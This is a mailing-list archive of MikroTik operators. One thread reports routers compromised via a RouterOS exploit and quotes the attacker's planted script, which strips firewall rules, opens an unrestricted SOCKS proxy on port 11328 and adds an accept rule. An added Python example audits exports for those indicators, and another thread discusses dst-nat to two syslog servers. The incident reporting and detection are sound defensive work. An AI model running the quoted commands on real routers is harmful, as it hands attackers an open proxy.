Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

2018-08-09 Thread ralphlists--- via Mikrotik-users
I only found it on boards that had Hotspot enabled. Did others find it on
ones without Hotspot?

 

From: mikrotik-users-boun...@wispa.org On Behalf Of Bruce Bridegwater via Mikrotik-users
Sent: Sunday, August 5, 2018 9:06 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'; Bob Pensworth
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

We found the same about 10 days ago. Upgraded to most current OS and
firmware versions, changed Winbox port to a 5 digit port and changed user
name from admin and 10 digit alphanumeric symbol password.

Only found it on wan interface that has a public ip. On almost all boards
including ccr devices.

Thought it was just us as we were at 6.41.3 or older.

From: mikrotik-users-boun...@wispa.org on behalf of Bob Pensworth via
Mikrotik-users <mikrotik-users@wispa.org>
Sent: Sunday, August 5, 2018 7:57:53 PM
To: 'Shawn C. Peppers'; 'Mikrotik Users'
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 

 

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

 

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

 

-- 

Bob Pensworth, WA7BOB | General Manager

  CresComm WiFi, LLC | (360) 928-, x1

 

From: mikrotik-users-boun...@wispa.org On Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: mikrotik-users@wispa.org; memb...@wisp.org
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

 

I have not tested this yet but

 

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

:: // DirectlinkAdmin.com  

___
Mikrotik-users mailing list
Mikrotik-users@wispa.org
http://lists.wispa.org/mailman/listinfo/mikrotik-users
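
An added example, not part of any message in the thread: a small audit of a saved RouterOS /export file for the three changes reported above (SOCKS enabled, an input accept rule commented "port NNNN", and a script or scheduler entry that turns SOCKS on). The sample export is constructed for illustration, and the function names and finding labels are assumptions of this example.

```python
import re

# Constructed sample of `/export` output showing the changes described in
# the thread (not taken from a real device).
SAMPLE_EXPORT = r'''/ip firewall filter
add action=accept chain=input comment="port 11328" port=11328 \
    protocol=tcp
add action=drop chain=input comment="drop everything else"
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=11328
/system scheduler
add interval=30s name=sched1 on-event=script1
/system script
add name=script1 source="/ip socks set enabled=yes port=11328"
'''

def parse_export(text):
    """Yield (menu_path, command) pairs, joining backslash-continued lines."""
    joined = re.sub(r"\\\r?\n\s*", "", text)
    menu = None
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and export header comments
        if line.startswith("/"):
            menu = line  # a menu path line such as "/ip socks"
        else:
            yield menu, line

def audit(text):
    """Return (kind, detail) findings for the indicators from the thread."""
    findings = []
    for menu, cmd in parse_export(text):
        if menu == "/ip socks" and "enabled=yes" in cmd:
            port = re.search(r"\bport=(\d+)", cmd)
            findings.append(("socks-enabled", port.group(1) if port else "default"))
        elif menu == "/ip firewall filter":
            tag = re.search(r'comment="(port \d+)"', cmd)
            if tag and "chain=input" in cmd and "action=accept" in cmd:
                findings.append(("input-accept-rule", tag.group(1)))
        elif menu in ("/system script", "/system scheduler") and "/ip socks set" in cmd:
            name = re.search(r"\bname=(\S+)", cmd)
            findings.append(("socks-script", name.group(1) if name else "?"))
    return findings

if __name__ == "__main__":
    for kind, detail in audit(SAMPLE_EXPORT):
        print(kind, detail)
```

An empty result only means these specific entries are absent from the export; it says nothing about other changes on the device.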


Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Josh Luthman via Mikrotik-users
Ranges I think so too but I don't think csv

Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Thu, Aug 9, 2018, 1:50 PM Scott Reed via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> I am pretty sure you can do ranges (with a -) or a comma separated
> list.  Just be sure to check when you are done that it does what you want.
>
>
> On 8/9/2018 12:44, Nick Bright via Mikrotik-users wrote:
> > Is there a way to specify multiple to-address in a dst-nat rule?
> >
> > This may not even be the right way to approach the problem, but it's
> > what came to mind.
> >
> > I am trying to take my inbound syslog traffic, and send it to two
> > different syslog servers inside the firewall.
> >
> > Any suggestions?
> >
>
> --
> Scott Reed
> SBRConsulting, LLC
> Network and Wireless Consulting
> WISPA Vendor Member
> IN UMC Associate Lay Leader
> SLI Coach Trained
>
>


Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Scott Reed via Mikrotik-users
I am pretty sure you can do ranges (with a -) or a comma separated 
list.  Just be sure to check when you are done that it does what you want.


On 8/9/2018 12:44, Nick Bright via Mikrotik-users wrote:
> Is there a way to specify multiple to-address in a dst-nat rule?
>
> This may not even be the right way to approach the problem, but it's
> what came to mind.
>
> I am trying to take my inbound syslog traffic, and send it to two
> different syslog servers inside the firewall.
>
> Any suggestions?
>

-- 
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained




Re: [Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Josh Luthman via Mikrotik-users
Talking about the dst-address?


Josh Luthman
Office: 937-552-2340
Direct: 937-552-2343
1100 Wayne St
Suite 1337
Troy, OH 45373

On Thu, Aug 9, 2018 at 12:44 PM, Nick Bright via Mikrotik-users <
mikrotik-users@wispa.org> wrote:

> Is there a way to specify multiple to-address in a dst-nat rule?
>
> This may not even be the right way to approach the problem, but it's
> what came to mind.
>
> I am trying to take my inbound syslog traffic, and send it to two
> different syslog servers inside the firewall.
>
> Any suggestions?
>
> --
> ---
> -  Nick Bright-
> -  Vice President of Technology   -
> -  Valnet -=- We Connect You -=-  -
> -  Tel 888-332-1616 x 315 / Fax 620-331-0789  -
> -  Web http://www.valnet.net/ -
> ---
> - Are your files safe?-
> - Valnet Vault - Secure Cloud Backup  -
> - More information & 30 day free trial at -
> - http://www.valnet.net/services/valnet-vault -
> ---
>


[Mikrotik Users] Multiple NAT targets

2018-08-09 Thread Nick Bright via Mikrotik-users
Is there a way to specify multiple to-address in a dst-nat rule?

This may not even be the right way to approach the problem, but it's 
what came to mind.

I am trying to take my inbound syslog traffic, and send it to two 
different syslog servers inside the firewall.

Any suggestions?

-- 
---
-  Nick Bright-
-  Vice President of Technology   -
-  Valnet -=- We Connect You -=-  -
-  Tel 888-332-1616 x 315 / Fax 620-331-0789  -
-  Web http://www.valnet.net/ -
---
- Are your files safe?-
- Valnet Vault - Secure Cloud Backup  -
- More information & 30 day free trial at -
- http://www.valnet.net/services/valnet-vault -
---
